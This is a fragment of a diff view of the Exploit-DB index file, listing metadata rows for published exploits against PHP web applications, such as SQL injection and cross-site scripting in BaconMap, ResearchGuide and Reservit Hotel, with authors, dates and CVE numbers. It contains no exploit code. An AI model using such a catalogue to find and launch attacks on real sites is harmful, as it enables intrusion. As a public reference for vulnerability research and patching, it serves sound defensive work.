15233,exploits/php/webapps/15233.txt,"BaconMap 1.0 - SQL Injection",2010-10-11,"John Leitch",webapps,php,,2010-10-11,2010-10-11,1,OSVDB-68599;CVE-2010-4800,,,,http://www.exploit-db.combaconmap1Duroc.zip,
|
||||
|
@ -29018,6 +29023,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
5911,exploits/php/webapps/5911.txt,"ResearchGuide 0.5 - 'id' SQL Injection",2008-06-23,dun,webapps,php,,2008-06-22,2016-12-09,1,OSVDB-46843;CVE-2008-2964,,,,,
|
||||
19775,exploits/php/webapps/19775.txt,"Reserve Logic 1.2 Booking CMS - Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,webapps,php,,2012-07-12,2012-07-12,0,CVE-2010-4980;OSVDB-83844;OSVDB-83842;OSVDB-83841;OSVDB-83840;OSVDB-83839;OSVDB-83838;OSVDB-83837;OSVDB-83836;OSVDB-83835;OSVDB-83834;OSVDB-83833;OSVDB-83832;OSVDB-83831;OSVDB-83830;OSVDB-83829;OSVDB-83828;OSVDB-83827;OSVDB-65952,,,,,https://www.vulnerability-lab.com/get_content.php?id=617
|
||||
46210,exploits/php/webapps/46210.txt,"Reservic 1.0 - 'id' SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,80,2019-01-21,2019-01-21,1,,"SQL Injection (SQLi)",,,,
|
||||
52133,exploits/php/webapps/52133.txt,"Reservit Hotel 2.1 - Stored Cross-Site Scripting (XSS)",2025-04-06,"Ilteris Kaan Pehlivan",webapps,php,,2025-04-06,2025-04-06,0,CVE-2024-9458,,,,,
|
||||
43676,exploits/php/webapps/43676.txt,"Reservo Image Hosting Script 1.5 - Cross-Site Scripting",2018-01-17,"Dennis Veninga",webapps,php,,2018-01-17,2018-01-17,0,CVE-2018-5705,,,,,
|
||||
48627,exploits/php/webapps/48627.txt,"Reside Property Management 3.0 - 'profile' SQL Injection",2020-06-30,"Behzad Khalifeh",webapps,php,,2020-06-30,2020-06-30,0,,,,,,
|
||||
35541,exploits/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - Cross-Site Scripting / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",webapps,php,,2014-12-15,2014-12-15,0,OSVDB-115821;OSVDB-115820;OSVDB-115819;OSVDB-115818,,,,,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue